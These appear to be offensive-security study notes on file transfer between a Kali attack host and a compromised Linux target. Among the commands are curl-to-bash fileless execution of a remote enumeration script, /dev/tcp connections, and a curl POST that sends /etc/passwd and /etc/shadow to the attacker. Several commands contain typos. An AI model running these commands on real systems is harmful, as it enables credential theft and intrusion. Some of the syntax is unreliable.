Linux File Transfer

# Downloads ## Base64 Encoding/Decoding ```bash #encode on Kali host md5sum <file_name> #save hash to confirm integrity after transfer cat <file_name> |base64 -w 0;echo #output encoded base64 string to stdout ``` ```bash #copy and paste to Linux target echo -n '<encoded_string>' | base64 -d > <file_name> md5sum <file_name> #confirm file integrity ``` ## Web Downloads with wget and curl ```bash wget https://<file_loc> -O /tmp/<output_name> curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh #file_loc could be GitHub or http web server on Kali host ``` ## Fileless Attacks using Linux ```bash wget -q0- https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | python3 curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash #file_loc could be GitHub or http web server on Kali host ``` ## Download with Bash ```bash exec 3<>/dev/tcp/<kali_host_ip>/<port> #connect to web server on kali host echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 #HTTP GET request cat <&3 ``` ## SSH Downloads ```bash #setup SSH server on Kali host sudo systemctl enable ssh sudo systemctl start ssh netstat -lntp #check for ssh listening port ``` ```bash #use scp to download file from Kali host scp user@<kali_host_ip>:/path/<target_file> . #download target file to current directory #able to create a temp user account for file transferts to avoud using primary creds ``` ## Python Urllib Module ```bash python3 #opens python3 interactive sub-shell >>> import urllib.request as request >>> request.urlretrieve("http://<target_ip>/<target_file>", output.txt") [C-c] #exit python sub-shell cat output.txt ``` ```bash #alternative to the above python3 #opens python3 interactive sub-shell >>> import urllib.request >>> request_url = urllib.request.urlopen(' http://<target_ip>/<target_file>') >>> print(request_url.read()) #prints contents of file.txt ``` # Uploads ## Web Uploads ```bash #setup upload server on Kali host sudo python3 -m pip install --user uploadserver openssl req -x509 -out server.pem -keyoput server.pem -newkey rsa:2048 -nodes -sha256 FILL IN #generate self-signed ssl cert mkdir https && cd https sudo python3 -m uploadserver 443 --sever-certification ~/sever.pem ``` ```bash #alternative steps to above pipx install uploadserver pipx run uploadserver #look at help page to include different port and cert ``` ```bash #upload files from target to Kali host curl -X POST https://<kali_host_ip>/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure #insecure flag is used to trust the self-signed cert ``` ## Alternative Web Transfer ```bash #setup web server on compromised machine python3 -m http.server #python3 module with port 8000 by default python2.7 -m SimpleHttpServer #python2.7 module with port 8000 by default php -S 0.0.0.0:8000 #php webserver ruby -run -ehttpd . -p8000 #ruby webserver ``` ```bash #download file on Kali host wget <target_ip>:8000/<file_name> ``` ## SCP Uploads ```bash scp /etc/passwd htb_student@<target_ip>:/home/htb_student ```